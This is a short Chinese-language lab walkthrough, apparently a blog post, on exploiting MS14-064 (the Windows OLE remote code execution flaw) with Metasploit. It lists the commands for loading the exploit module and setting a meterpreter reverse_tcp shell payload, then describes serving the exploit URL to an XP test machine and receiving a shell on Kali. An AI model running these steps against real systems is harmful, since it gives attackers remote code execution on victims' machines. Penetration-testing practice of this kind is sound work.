MS14-064 漏洞測試入侵
Microsoft Windows OLE遠程代碼執行漏洞,OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術
執行摘要
-
此安全更新可解決 Microsoft Windows 對象鏈接與嵌入 (OLE) 中 2 個私下報告的漏洞。最嚴重的漏洞可能在用戶使用 Internet Explorer 查看經特殊設計的網頁時允許遠程執行代碼。成功利用這些漏洞的攻擊者可以在當前用戶的上下文中運行任意代碼。如果當前用戶使用管理用戶權限登錄,則攻擊者可隨后安裝程序;查看、更改或刪除數據;或者創建擁有完全用戶權限的新帳戶。那些帳戶被配置為擁有較少用戶權限的用戶比具有管理用戶權限的用戶受到的影響要小。 對於 Microsoft Windows 所有受支持的版本,此安全更新的等級為“嚴重”。更多詳細信息可見:微軟安全技術中心
-
遠程攻擊者利用此漏洞通過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本
實踐過程
- 此漏洞利用的模塊 :exploit/windows/browser/ms14_064_ole_code_execution
執行命令:
-
msfconsole //啟動MSF
-
search ms14 //可以搜索14年的漏洞
-
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊
-
show payload //查看可用

-
set payload windows/meterpreter/reverse_tcp //設置反彈連接shell
- info查看詳細信息

-
特別注意:上圖在requied列中“yes”的屬性是必需要的。其中標記的第一個屬性默認為false 需要設置為true ,因為msf中自帶的漏洞利用exp調用的是 powershell。 所以msf中的exp代碼只對安裝powershell的系統生效。查看信息,可以攻擊的系統有xp和win7

-
各個屬性配置好后 執行exploit即可
-
得到一個URL地址,到靶機上進行(xp)測試

-
kail反彈了一個shell,測試成功

